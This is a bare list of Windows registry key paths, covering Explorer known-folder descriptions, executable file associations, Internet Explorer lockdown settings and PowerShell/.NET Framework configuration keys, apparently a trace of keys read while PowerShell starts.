HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KnownFolderSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\WScript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\WScript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\AppendPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\PATH
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c644-6060-11ed-bf52-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c644-6060-11ed-bf52-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\NetFrameworkV4IsInstalled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index165
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.System.Management.Automation__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.System.Management.Automation__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Data__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Data__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.SMDiagnostics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.SMDiagnostics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\ServiceStackVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
